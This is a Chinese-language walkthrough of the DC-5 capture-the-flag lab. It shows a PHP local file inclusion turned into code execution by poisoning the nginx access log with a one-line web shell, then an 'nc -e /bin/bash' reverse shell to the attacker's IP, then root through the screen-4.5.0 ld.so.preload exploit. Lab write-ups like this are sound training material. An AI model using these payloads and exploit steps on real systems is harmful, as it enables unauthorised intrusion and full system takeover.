DC-5

DC-5

信息收集

nmap -T4 -A -p 1-65535 192.168.211.137

DC-5

80和111,扫下目录

dirb http://192.168.211.137/

DC-5

再看下网页,功能也挺简单

DC-5

作者说了随着页面刷新而改变的东西,感觉漏洞点可能在提交表单后的/thankyou.php

尝试了一下,发现刷新页面,Copyright的年份会跟着变

DC-5

web渗透

LFI文件包含

DC-5

面向百度渗透,可能存在LFI,那尝试一下

?file=php://filter/read=convert.base64-encode/resource=index.php

DC-5

确实存在此漏洞,读一下thankyou.php的源代码

<?php

					$file = $_GET['file'];
						if(isset($file))
						{
							include("$file");
						}
						else
						{
							include("footer.php");
						}

				?>

就是很简单一个文件包含include 函数,再读一下/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
dc:x:1000:1000:dc,,,:/home/dc:/bin/bash
mysql:x:108:113:MySQL Server,,,:/nonexistent:/bin/false

DC-5

尝试php://input写入一句话木马,失败了,可能是权限或者设置的问题,读一下nginx配置文件看一看

user www-data;
worker_processes 4;
pid /run/nginx.pid;

events {
	worker_connections 768;
	# multi_accept on;
}

http {

	##
	# Basic Settings
	##

	sendfile on;
	tcp_nopush on;
	tcp_nodelay on;
	keepalive_timeout 65;
	types_hash_max_size 2048;
	# server_tokens off;

	# server_names_hash_bucket_size 64;
	# server_name_in_redirect off;

	include /etc/nginx/mime.types;
	default_type application/octet-stream;

	##
	# SSL Settings
	##

	ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
	ssl_prefer_server_ciphers on;

	##
	# Logging Settings
	##

	access_log /var/log/nginx/access.log;
	error_log /var/log/nginx/error.log;

	##
	# Gzip Settings
	##

	gzip on;
	gzip_disable "msie6";

	# gzip_vary on;
	# gzip_proxied any;
	# gzip_comp_level 6;
	# gzip_buffers 16 8k;
	# gzip_http_version 1.1;
	# gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

	##
	# Virtual Host Configs
	##

	include /etc/nginx/conf.d/*.conf;
	include /etc/nginx/sites-enabled/*;
}


#mail {
#	# See sample authentication script at:
#	# http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
# 
#	# auth_http localhost/auth.php;
#	# pop3_capabilities "TOP" "USER";
#	# imap_capabilities "IMAP4rev1" "UIDPLUS";
# 
#	server {
#		listen     localhost:110;
#		protocol   pop3;
#		proxy      on;
#	}
# 
#	server {
#		listen     localhost:143;
#		protocol   imap;
#		proxy      on;
#	}
#}

日志存放在

/var/log/nginx/access.log

DC-5

那思考,直接访问带一句话木马的url,让其在日志中,通过日志配合文件包含getshell

命令执行

?file=/var/log/nginx/access.log

访问<?php system($_GET['cmd']); ?>,让日志中存在这句代码

DC-5

文件包含执行system函数,反弹shell

/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.211.131 6666

DC-5

成功反弹shell

提权

信息收集

DC-5

内核提权看来不太可能,尝试一下SUID提权

SUID提权

find / -perm -u=s -type f 2>/dev/null

发现有screen-4.5.0

searchsploit screen

DC-5

41154文件无法直接运行,需要分成三个部分

libhax.c

DC-5

编译:gcc -fPIC -shared -ldl -o libhax.so libhax.c

rootshell.c

DC-5

编译:gcc -o rootshell rootshell.c

搭建一个http server

python -m SimpleHTTPServer 1337

将这两个文件传入靶机/tmp目录中

依次输入

cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls

/tmp/rootshell

成功提权

DC-5

获取flag

DC-5

上一篇:DC-2


下一篇:研发2MHz 65W DC-DC转换器及世界首款完全集成的ACF PWM控制器的“电源管理重新构想者”